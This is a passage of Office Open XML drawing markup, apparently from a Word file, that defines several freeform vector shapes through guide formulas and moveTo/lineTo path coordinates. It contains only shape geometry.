                                  <a:gd name="T72" fmla="*/ 321 w 461"/>
                                  <a:gd name="T73" fmla="*/ 151 h 394"/>
                                  <a:gd name="T74" fmla="*/ 347 w 461"/>
                                  <a:gd name="T75" fmla="*/ 104 h 394"/>
                                  <a:gd name="T76" fmla="*/ 300 w 461"/>
                                  <a:gd name="T77" fmla="*/ 82 h 394"/>
                                  <a:gd name="T78" fmla="*/ 285 w 461"/>
                                  <a:gd name="T79" fmla="*/ 117 h 394"/>
                                  <a:gd name="T80" fmla="*/ 264 w 461"/>
                                  <a:gd name="T81" fmla="*/ 99 h 394"/>
                                  <a:gd name="T82" fmla="*/ 280 w 461"/>
                                  <a:gd name="T83" fmla="*/ 48 h 394"/>
                                  <a:gd name="T84" fmla="*/ 352 w 461"/>
                                  <a:gd name="T85" fmla="*/ 43 h 394"/>
                                  <a:gd name="T86" fmla="*/ 378 w 461"/>
                                  <a:gd name="T87" fmla="*/ 74 h 394"/>
                                  <a:gd name="T88" fmla="*/ 393 w 461"/>
                                  <a:gd name="T89" fmla="*/ 74 h 394"/>
                                  <a:gd name="T90" fmla="*/ 388 w 461"/>
                                  <a:gd name="T91" fmla="*/ 35 h 394"/>
                                  <a:gd name="T92" fmla="*/ 424 w 461"/>
                                  <a:gd name="T93" fmla="*/ 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394">
                                    <a:moveTo>
                                      <a:pt x="455" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="461" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="455" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="445" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="435" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="429" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="429" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="414" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="409" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="404" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="404" y="99"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="393" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="378" y="151"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="352" y="169"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="321" y="182"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="295" y="182"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="259" y="182"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="228" y="173"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="176" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="130" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="125" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="187" y="182"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="212" y="221"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="218" y="238"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="218" y="260"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="218" y="281"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="207" y="303"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="192" y="316"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="166" y="329"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="150" y="338"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="130" y="342"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="342"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="346"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="355"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="364"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="372"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="372"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="37" y="372"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="37" y="368"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="372"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="381"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="394"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="394"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="394"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="385"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="372"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="364"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="342"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="333"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="333"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="325"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="83" y="316"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="73" y="316"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="307"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="294"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="281"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="264"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="255"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="238"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="83" y="225"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="109" y="229"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="130" y="234"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="140" y="247"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="140" y="251"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="140" y="255"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="125" y="251"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="251"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="104" y="255"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="94" y="264"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="94" y="273"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="94" y="281"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="299"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="130" y="303"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="299"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="166" y="294"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="176" y="286"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="192" y="255"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="192" y="229"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="187" y="203"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="171" y="182"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="156" y="160"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="160"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="150" y="177"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="161" y="199"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="171" y="216"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="171" y="238"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="166" y="255"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="156" y="208"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="186"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="130" y="164"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="104" y="130"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="73" y="99"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="37" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="130" y="86"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="181" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="207" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="238" y="138"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="285" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="264" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="238" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="187" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="176" y="130"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="192" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="212" y="151"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="238" y="160"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="264" y="164"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="295" y="160"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="321" y="151"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="342" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="347" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="347" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="336" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="326" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="300" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="295" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="285" y="99"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="285" y="117"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="274" y="117"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="269" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="264" y="99"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="264" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="264" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="280" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="295" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="326" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="352" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="373" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="378" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="378" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="383" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="393" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="393" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="393" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="388" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="388" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="404" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="409" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="424" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="445" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="455"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318"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7876" y="3365"/>
                                <a:ext cx="5" cy="4"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 5 w 5"/>
                                  <a:gd name="T1" fmla="*/ 0 h 4"/>
                                  <a:gd name="T2" fmla="*/ 5 w 5"/>
                                  <a:gd name="T3" fmla="*/ 0 h 4"/>
                                  <a:gd name="T4" fmla="*/ 0 w 5"/>
                                  <a:gd name="T5" fmla="*/ 4 h 4"/>
                                  <a:gd name="T6" fmla="*/ 0 w 5"/>
                                  <a:gd name="T7" fmla="*/ 4 h 4"/>
                                  <a:gd name="T8" fmla="*/ 0 w 5"/>
                                  <a:gd name="T9" fmla="*/ 0 h 4"/>
                                  <a:gd name="T10" fmla="*/ 5 w 5"/>
                                  <a:gd name="T11" fmla="*/ 0 h 4"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T8" y="T9"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T10" y="T11"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="5" h="4">
                                    <a:moveTo>
                                      <a:pt x="5" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5"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65" name="Freeform 319"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7674" y="3378"/>
                                <a:ext cx="94" cy="51"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 94 w 94"/>
                                  <a:gd name="T1" fmla="*/ 13 h 51"/>
                                  <a:gd name="T2" fmla="*/ 62 w 94"/>
                                  <a:gd name="T3" fmla="*/ 17 h 51"/>
                                  <a:gd name="T4" fmla="*/ 21 w 94"/>
                                  <a:gd name="T5" fmla="*/ 51 h 51"/>
                                  <a:gd name="T6" fmla="*/ 11 w 94"/>
                                  <a:gd name="T7" fmla="*/ 47 h 51"/>
                                  <a:gd name="T8" fmla="*/ 0 w 94"/>
                                  <a:gd name="T9" fmla="*/ 38 h 51"/>
                                  <a:gd name="T10" fmla="*/ 11 w 94"/>
                                  <a:gd name="T11" fmla="*/ 21 h 51"/>
                                  <a:gd name="T12" fmla="*/ 21 w 94"/>
                                  <a:gd name="T13" fmla="*/ 4 h 51"/>
                                  <a:gd name="T14" fmla="*/ 42 w 94"/>
                                  <a:gd name="T15" fmla="*/ 0 h 51"/>
                                  <a:gd name="T16" fmla="*/ 52 w 94"/>
                                  <a:gd name="T17" fmla="*/ 0 h 51"/>
                                  <a:gd name="T18" fmla="*/ 83 w 94"/>
                                  <a:gd name="T19" fmla="*/ 0 h 51"/>
                                  <a:gd name="T20" fmla="*/ 94 w 94"/>
                                  <a:gd name="T21"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4" h="51">
                                    <a:moveTo>
                                      <a:pt x="94" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="51"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="38"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="83" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="94"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66" name="Freeform 320"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8243" y="3391"/>
                                <a:ext cx="16" cy="34"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 16 w 16"/>
                                  <a:gd name="T1" fmla="*/ 34 h 34"/>
                                  <a:gd name="T2" fmla="*/ 10 w 16"/>
                                  <a:gd name="T3" fmla="*/ 34 h 34"/>
                                  <a:gd name="T4" fmla="*/ 0 w 16"/>
                                  <a:gd name="T5" fmla="*/ 30 h 34"/>
                                  <a:gd name="T6" fmla="*/ 0 w 16"/>
                                  <a:gd name="T7" fmla="*/ 21 h 34"/>
                                  <a:gd name="T8" fmla="*/ 5 w 16"/>
                                  <a:gd name="T9" fmla="*/ 8 h 34"/>
                                  <a:gd name="T10" fmla="*/ 16 w 16"/>
                                  <a:gd name="T11" fmla="*/ 0 h 34"/>
                                  <a:gd name="T12" fmla="*/ 16 w 16"/>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6" h="34">
                                    <a:moveTo>
                                      <a:pt x="16" y="34"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="34"/>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321"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7830" y="3412"/>
                                <a:ext cx="93" cy="43"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 93 w 93"/>
                                  <a:gd name="T1" fmla="*/ 13 h 43"/>
                                  <a:gd name="T2" fmla="*/ 93 w 93"/>
                                  <a:gd name="T3" fmla="*/ 22 h 43"/>
                                  <a:gd name="T4" fmla="*/ 93 w 93"/>
                                  <a:gd name="T5" fmla="*/ 30 h 43"/>
                                  <a:gd name="T6" fmla="*/ 77 w 93"/>
                                  <a:gd name="T7" fmla="*/ 43 h 43"/>
                                  <a:gd name="T8" fmla="*/ 67 w 93"/>
                                  <a:gd name="T9" fmla="*/ 43 h 43"/>
                                  <a:gd name="T10" fmla="*/ 56 w 93"/>
                                  <a:gd name="T11" fmla="*/ 43 h 43"/>
                                  <a:gd name="T12" fmla="*/ 51 w 93"/>
                                  <a:gd name="T13" fmla="*/ 43 h 43"/>
                                  <a:gd name="T14" fmla="*/ 56 w 93"/>
                                  <a:gd name="T15" fmla="*/ 39 h 43"/>
                                  <a:gd name="T16" fmla="*/ 67 w 93"/>
                                  <a:gd name="T17" fmla="*/ 30 h 43"/>
                                  <a:gd name="T18" fmla="*/ 72 w 93"/>
                                  <a:gd name="T19" fmla="*/ 26 h 43"/>
                                  <a:gd name="T20" fmla="*/ 72 w 93"/>
                                  <a:gd name="T21" fmla="*/ 17 h 43"/>
                                  <a:gd name="T22" fmla="*/ 51 w 93"/>
                                  <a:gd name="T23" fmla="*/ 17 h 43"/>
                                  <a:gd name="T24" fmla="*/ 36 w 93"/>
                                  <a:gd name="T25" fmla="*/ 22 h 43"/>
                                  <a:gd name="T26" fmla="*/ 10 w 93"/>
                                  <a:gd name="T27" fmla="*/ 43 h 43"/>
                                  <a:gd name="T28" fmla="*/ 0 w 93"/>
                                  <a:gd name="T29" fmla="*/ 43 h 43"/>
                                  <a:gd name="T30" fmla="*/ 0 w 93"/>
                                  <a:gd name="T31" fmla="*/ 43 h 43"/>
                                  <a:gd name="T32" fmla="*/ 0 w 93"/>
                                  <a:gd name="T33" fmla="*/ 39 h 43"/>
                                  <a:gd name="T34" fmla="*/ 10 w 93"/>
                                  <a:gd name="T35" fmla="*/ 22 h 43"/>
                                  <a:gd name="T36" fmla="*/ 20 w 93"/>
                                  <a:gd name="T37" fmla="*/ 13 h 43"/>
                                  <a:gd name="T38" fmla="*/ 36 w 93"/>
                                  <a:gd name="T39" fmla="*/ 4 h 43"/>
                                  <a:gd name="T40" fmla="*/ 51 w 93"/>
                                  <a:gd name="T41" fmla="*/ 0 h 43"/>
                                  <a:gd name="T42" fmla="*/ 77 w 93"/>
                                  <a:gd name="T43" fmla="*/ 0 h 43"/>
                                  <a:gd name="T44" fmla="*/ 93 w 93"/>
                                  <a:gd name="T45"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3" h="43">
                                    <a:moveTo>
                                      <a:pt x="93" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="56" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="56" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="13"/>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68" name="Freeform 322"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7623" y="3438"/>
                                <a:ext cx="1" cy="4"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 0 h 4"/>
                                  <a:gd name="T1" fmla="*/ 4 h 4"/>
                                  <a:gd name="T2" fmla="*/ 0 h 4"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="0" y="T0"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="0" y="T2"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path h="4">
                                    <a:moveTo>
                                      <a:pt x="0" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0"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69" name="Freeform 323"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7809" y="3468"/>
                                <a:ext cx="62" cy="44"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 62 w 62"/>
                                  <a:gd name="T1" fmla="*/ 18 h 44"/>
                                  <a:gd name="T2" fmla="*/ 57 w 62"/>
                                  <a:gd name="T3" fmla="*/ 31 h 44"/>
                                  <a:gd name="T4" fmla="*/ 46 w 62"/>
                                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                                  <a:gd name="T6" fmla="*/ 41 w 62"/>
                                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                                  <a:gd name="T8" fmla="*/ 41 w 62"/>
                                  <a:gd name="T9" fmla="*/ 35 h 44"/>
                                  <a:gd name="T10" fmla="*/ 41 w 62"/>
                                  <a:gd name="T11" fmla="*/ 26 h 44"/>
                                  <a:gd name="T12" fmla="*/ 41 w 62"/>
                                  <a:gd name="T13" fmla="*/ 18 h 44"/>
                                  <a:gd name="T14" fmla="*/ 41 w 62"/>
                                  <a:gd name="T15" fmla="*/ 13 h 44"/>
                                  <a:gd name="T16" fmla="*/ 31 w 62"/>
                                  <a:gd name="T17" fmla="*/ 18 h 44"/>
                                  <a:gd name="T18" fmla="*/ 26 w 62"/>
                                  <a:gd name="T19" fmla="*/ 22 h 44"/>
                                  <a:gd name="T20" fmla="*/ 15 w 62"/>
                                  <a:gd name="T21" fmla="*/ 26 h 44"/>
                                  <a:gd name="T22" fmla="*/ 0 w 62"/>
                                  <a:gd name="T23" fmla="*/ 31 h 44"/>
                                  <a:gd name="T24" fmla="*/ 0 w 62"/>
                                  <a:gd name="T25" fmla="*/ 22 h 44"/>
                                  <a:gd name="T26" fmla="*/ 0 w 62"/>
                                  <a:gd name="T27" fmla="*/ 13 h 44"/>
                                  <a:gd name="T28" fmla="*/ 21 w 62"/>
                                  <a:gd name="T29" fmla="*/ 5 h 44"/>
                                  <a:gd name="T30" fmla="*/ 41 w 62"/>
                                  <a:gd name="T31" fmla="*/ 0 h 44"/>
                                  <a:gd name="T32" fmla="*/ 46 w 62"/>
                                  <a:gd name="T33" fmla="*/ 0 h 44"/>
                                  <a:gd name="T34" fmla="*/ 57 w 62"/>
                                  <a:gd name="T35" fmla="*/ 5 h 44"/>
                                  <a:gd name="T36" fmla="*/ 62 w 62"/>
                                  <a:gd name="T37" fmla="*/ 18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44">
                                    <a:moveTo>
                                      <a:pt x="62" y="18"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
